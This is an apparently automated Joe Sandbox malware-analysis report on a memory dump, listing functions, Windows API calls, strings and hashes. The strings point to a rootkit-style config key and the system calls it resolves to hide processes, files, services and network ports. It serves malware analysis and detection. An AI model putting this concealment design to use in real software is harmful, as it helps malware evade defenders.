Part of subcall function 00000125D4011274: RtlAllocateHeap.NTDLL ref: 00000125D4011289
Part of subcall function 00000125D4011274: GetProcessHeap.KERNEL32 ref: 00000125D40112A3
Part of subcall function 00000125D4011274: RtlAllocateHeap.NTDLL ref: 00000125D40112B4

RegOpenKeyExW.ADVAPI32 ref: 00000125D40116DA
RegOpenKeyExW.ADVAPI32 ref: 00000125D4011707
RegCloseKey.ADVAPI32 ref: 00000125D4011721
RegOpenKeyExW.ADVAPI32 ref: 00000125D4011741
RegCloseKey.ADVAPI32 ref: 00000125D401175C
RegOpenKeyExW.ADVAPI32 ref: 00000125D401177C
RegCloseKey.ADVAPI32 ref: 00000125D4011797
RegOpenKeyExW.ADVAPI32 ref: 00000125D40117B7
RegCloseKey.ADVAPI32 ref: 00000125D40117D2
RegOpenKeyExW.ADVAPI32 ref: 00000125D40117F2
RegCloseKey.ADVAPI32 ref: 00000125D401180D
RegOpenKeyExW.ADVAPI32 ref: 00000125D401182D
RegCloseKey.ADVAPI32 ref: 00000125D4011848
RegOpenKeyExW.ADVAPI32 ref: 00000125D4011868
RegCloseKey.ADVAPI32 ref: 00000125D4011883
RegOpenKeyExW.ADVAPI32 ref: 00000125D40118A3
RegCloseKey.ADVAPI32 ref: 00000125D40118BE
RegCloseKey.ADVAPI32 ref: 00000125D40118C8

Part of subcall function 00000125D40112C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000125D4011326
Part of subcall function 00000125D40112C8: GetProcessHeap.KERNEL32 ref: 00000125D4011334
Part of subcall function 00000125D40112C8: RtlAllocateHeap.NTDLL ref: 00000125D4011345
Part of subcall function 00000125D40112C8: RegEnumValueW.ADVAPI32 ref: 00000125D40113A1
Part of subcall function 00000125D40112C8: GetProcessHeap.KERNEL32 ref: 00000125D40113E9
Part of subcall function 00000125D40112C8: RtlAllocateHeap.NTDLL ref: 00000125D40113F7
Part of subcall function 00000125D40112C8: GetProcessHeap.KERNEL32 ref: 00000125D401141B
Part of subcall function 00000125D40112C8: HeapFree.KERNEL32 ref: 00000125D4011429
Part of subcall function 00000125D40112C8: lstrlenW.KERNEL32 ref: 00000125D4011432
Part of subcall function 00000125D40112C8: GetProcessHeap.KERNEL32 ref: 00000125D4011440
Part of subcall function 00000125D40112C8: RtlAllocateHeap.NTDLL ref: 00000125D401144E

Strings

service_names, xrefs: 00000125D40117EB
tcp_local, xrefs: 00000125D4011826
udp, xrefs: 00000125D401189C
tcp_remote, xrefs: 00000125D4011861
process_names, xrefs: 00000125D4011775
pid, xrefs: 00000125D401173A
SOFTWARE\dialerconfig, xrefs: 00000125D40116BA
startup, xrefs: 00000125D40116FD
paths, xrefs: 00000125D40117B0

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Allocate$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 194202978-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 868e0d8b588af5acf42f02fcf6bcc45545a909e14d28c16c323a3b88dc37ace0
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 04711A36711E5896EB149FB5E8D07E92BAAF788B88F805111DE4D8FBA8DF34C464C740

Function 00000125D40112C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000125D4011326
GetProcessHeap.KERNEL32 ref: 00000125D4011334
RtlAllocateHeap.NTDLL ref: 00000125D4011345
RegEnumValueW.ADVAPI32 ref: 00000125D40113A1

Part of subcall function 00000125D4011554: StrCmpIW.SHLWAPI ref: 00000125D4011585

GetProcessHeap.KERNEL32 ref: 00000125D40113E9
RtlAllocateHeap.NTDLL ref: 00000125D40113F7
GetProcessHeap.KERNEL32 ref: 00000125D401141B
HeapFree.KERNEL32 ref: 00000125D4011429
lstrlenW.KERNEL32 ref: 00000125D4011432
GetProcessHeap.KERNEL32 ref: 00000125D4011440
RtlAllocateHeap.NTDLL ref: 00000125D401144E
StrCpyW.SHLWAPI ref: 00000125D4011470
GetProcessHeap.KERNEL32 ref: 00000125D4011485
HeapFree.KERNEL32 ref: 00000125D4011493

Strings

d, xrefs: 00000125D4011365

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$Process$Allocate$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2772000396-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: f9d5bde1adb29034eadf19fb96c06b3b22d569f24bb093e8a420f7b069aa5f85
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 14515F72215F4893EB14CFA2E5843EABBA6F788B80F848124DA494FB54DF38D165CB40

Function 00000125D4011EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000125D4011EBF

Part of subcall function 00000125D4012174: GetModuleHandleA.KERNEL32 ref: 00000125D401218C
Part of subcall function 00000125D4012174: GetProcAddress.KERNEL32 ref: 00000125D401219D

Part of subcall function 00000125D4015C10: GetCurrentThreadId.KERNEL32 ref: 00000125D4015C4B

Strings

sechost.dll, xrefs: 00000125D4011FD9
EnumServiceGroupW, xrefs: 00000125D4011F90
NtResumeThread, xrefs: 00000125D4011F02
NtDeviceIoControlFile, xrefs: 00000125D4011FF6
NtEnumerateKey, xrefs: 00000125D4011F59
EnumServicesStatusExW, xrefs: 00000125D4011FB1, 00000125D4011FD2
NtQueryDirectoryFileEx, xrefs: 00000125D4011F3C
advapi32.dll, xrefs: 00000125D4011F97, 00000125D4011FB8
NtQuerySystemInformation, xrefs: 00000125D4011EE5
NtQueryDirectoryFile, xrefs: 00000125D4011F1F
NtEnumerateValueKey, xrefs: 00000125D4011F76
ntdll.dll, xrefs: 00000125D4011ECD

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 2bdbd3ac0d5721edcb9f8c439622c6a03af0ab73b38f1333d1df33f4cb6f0215
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 1931C374252D4EB2EB04EFE5E8D26F43B23F794344FD054279509AE1A69F38927AC780

Function 00000125D401D2CC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00000125D401D424

Strings

d<m{8, xrefs: 00000125D401D303, 00000125D401D410, 00000125D401D42F, 00000125D401D458, 00000125D401D461
ext-ms-, xrefs: 00000125D401D3A4
api-ms-, xrefs: 00000125D401D391

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: AddressProc
String ID: api-ms-$d<m{8$ext-ms-
API String ID: 190572456-1566161328
Opcode ID: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction ID: c9861b46f3ec394aefbc40d6bfd8c5fd7dd73ebf15f63bbf8f10e08c84c9c31a
Opcode Fuzzy Hash: f5082d46cd3e032fbbfcba80e3c796c34016e7f71c0b089d04f54faabee83c69
Instruction Fuzzy Hash: F641D031712E8883FB218B96A8C47F92A93FB04BD0F8845259D099F3D4EB3CE4258280

Function 00000125D401104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000125D40110AB
RegEnumValueW.ADVAPI32 ref: 00000125D401110E
GetProcessHeap.KERNEL32 ref: 00000125D4011155
RtlAllocateHeap.NTDLL ref: 00000125D4011163
GetProcessHeap.KERNEL32 ref: 00000125D4011187
HeapFree.KERNEL32 ref: 00000125D4011195

Strings

d, xrefs: 00000125D40110CE

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$Process$AllocateEnumFreeInfoQueryValue
String ID: d
API String ID: 1572912380-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: a8edd0ea4652e70612fafd38e2bcb13de47dfc8bae6f7a635e06821f06cecbde
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 9C418233615F8497E7648FA1E4847EABBA6F388B84F408125DB894FB54DF38D164CB00

Function 00000125D4019804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000125D4019889
GetLastError.KERNEL32 ref: 00000125D4019897
LoadLibraryExW.KERNEL32 ref: 00000125D40198C1
FreeLibrary.KERNEL32 ref: 00000125D4019907
GetProcAddress.KERNEL32 ref: 00000125D4019913

Strings

api-ms-, xrefs: 00000125D40198A9

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 9419b912e4ce57f2ed3f519e8da04bc0e4f1344d6927a75c50027208998938d2
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 8931B231203E4891EF12DF96A4807F96A95F748BA4F994525AD6D8E384DF38C065C700

Function 00000125D4011A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000125D4011A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000125D4011A58
PathFindFileNameW.SHLWAPI ref: 00000125D4011A67
lstrlenW.KERNEL32 ref: 00000125D4011A73
StrCpyW.SHLWAPI ref: 00000125D4011A86
CloseHandle.KERNEL32 ref: 00000125D4011A94

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 5565b372dfcfde617a1e1899568ad11a3411a5107f78f50ac7e11b9e160b5a31
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: 2E013C31300E4996EB149B62A4D83E96BA6F788FC4FC84135CE494B794DF3CD5958700

Function 00000125D40137AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000125D40137C8
GetCurrentProcess.KERNEL32 ref: 00000125D40137D6
VirtualProtectEx.KERNEL32 ref: 00000125D40137F8
GetCurrentProcess.KERNEL32 ref: 00000125D4013819
VirtualProtectEx.KERNEL32 ref: 00000125D401383A
TerminateThread.KERNEL32 ref: 00000125D4013849

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 698edeb1479480d0395b041c2fd804acd747e098864697457a4eaa04f62d6f66
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 8B115B74212F4883FB249BA1E4D97E66AA6FB58B81F840429CE494F794EF3CD0298714

Function 00000125D4011AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000125D4011AD8
StrCmpNIW.SHLWAPI ref: 00000125D4011AF2
lstrlenW.KERNEL32 ref: 00000125D4011B01
StrCpyW.SHLWAPI ref: 00000125D4011B16

Strings

\\?\, xrefs: 00000125D4011AE6

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 537758a8525797fd475d04f0d48a4e9d919338496024da9a5461ab29499c535e
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 69F04432304A4993E7208BA1F4D47E96B66F748B88FC48020CA494E994DF3CD65CCB00

Function 00000125D4013200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000125D4013222
StrCpyW.SHLWAPI ref: 00000125D4013232
StrCatW.SHLWAPI ref: 00000125D401323E
PathCombineW.SHLWAPI ref: 00000125D401324C

Strings

\\.\pipe\, xrefs: 00000125D4013218

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 0aded69d13021f4290b452c685b05ae430db1f9ba5c97257655481bc1d089f38
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 50F05430304F4492EB045B93B9C51E55A26EB48FD0F844131DD564FB58CF3CD5658700

Function 00000125D401A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000125D401A154
GetProcAddress.KERNEL32 ref: 00000125D401A16A
FreeLibrary.KERNEL32 ref: 00000125D401A187

Strings

mscoree.dll, xrefs: 00000125D401A14B
CorExitProcess, xrefs: 00000125D401A163

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 3bbbc512dc9b527b5a08f8f5c787c36b2a7ea106e5c71ef0781df340a2ed368e
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: ADF0FE71311E4893EB545BE0E8D43F52B66EB88B90FC42019954B8D5A5DF3CD5ACCB10

Function 00000125D4021B9C Relevance: 7.5, APIs: 5, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000125D4021BCD
GetLastError.KERNEL32 ref: 00000125D4021BD9
CloseHandle.KERNEL32 ref: 00000125D4021BF1
CreateFileW.KERNEL32 ref: 00000125D4021C1C
WriteConsoleW.KERNEL32 ref: 00000125D4021C3B

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID:
API String ID: 3230265001-0
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 9a6152dc826ce92f17b38d702ebbec9f60248a66bbc3fad4f0e46a3676463d2d
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 88119031314F9487E7508B92E8D43E9AAA6F788FE4F940214EA5D8F7D4CF38D9248740

Function 00000125D4020604 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000125D402071B
GetLastError.KERNEL32 ref: 00000125D402073D

Strings

d<m{8, xrefs: 00000125D4020623
U, xrefs: 00000125D40206C7

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U$d<m{8
API String ID: 442123175-23043668
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 9f4c000c02194ed71cc9866ea01a38a5f872a5551d92ee2f8c58adc49d9e6f1a
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: DD41A572715F8482EB209F65E4C47E9ABA2F798784F808125EF4D8B798DB3CD551CB40

Function 00000125D4018400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000125D401840B
RtlLookupFunctionEntry.NTDLL ref: 00000125D4018425
RtlVirtualUnwind.NTDLL ref: 00000125D401845C

Strings

NtQuerySystemInformation, xrefs: 00000125D4018402

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual
String ID: NtQuerySystemInformation
API String ID: 2154932578-2549949336
Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction ID: 63923aeaa3db2958dc5aa537b59327ef8baa4b68400934d314d4c8dcdb7a4d5b
Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
Instruction Fuzzy Hash: 27F0A477214B4483E7108B65F4803FB6766F789B90F840124EE8E8AB44DF38D695CB00

Function 00000125D4020860 Relevance: 6.2, APIs: 4, Instructions: 202COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 00000125D4020960
GetLastError.KERNEL32 ref: 00000125D40209EA

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 7bc19bb1cd192f66411804eb33a899b20a1ca411684180bedd583a5ca514a588
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 3B819E32610F189AFB519BA5C8D07FD2EA2F744B84FC48116DF4A9BAD1DB38A466C310

Function 00000125D4011D60 Relevance: 6.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000125D4011D9B
RtlAllocateHeap.NTDLL ref: 00000125D4011DAA
GetProcessHeap.KERNEL32 ref: 00000125D4011E1E
HeapFree.KERNEL32 ref: 00000125D4011E2C

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 9ed737e72c5e53739e3390a0e30b26f1176aa9f95f17962c2cbcd25c5cbdd6ce
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 1521BA32605F8482EB158FA9E4802EAF7E1FBC8B94F454110DE8D9F754EF38C5528700

Function 00000125D4011274 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000125D401127A
RtlAllocateHeap.NTDLL ref: 00000125D4011289
GetProcessHeap.KERNEL32 ref: 00000125D40112A3
RtlAllocateHeap.NTDLL ref: 00000125D40112B4

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 5bbb2ecfa74d26f1be751ed74199e31282ff47a5710e6e58ce819663bf283917
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 38E0ED71611A0487E7049FB6D8953E97AE6FBC8F51F89C024C9490F390DF7D94A9CB50

Function 00000125D401CCB4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00000125D401C6CC: GetOEMCP.KERNEL32 ref: 00000125D401C6F6

IsValidCodePage.KERNEL32 ref: 00000125D401CD1F
GetCPInfo.KERNEL32 ref: 00000125D401CD6B

Strings

d<m{8, xrefs: 00000125D401CCC8

Memory Dump Source

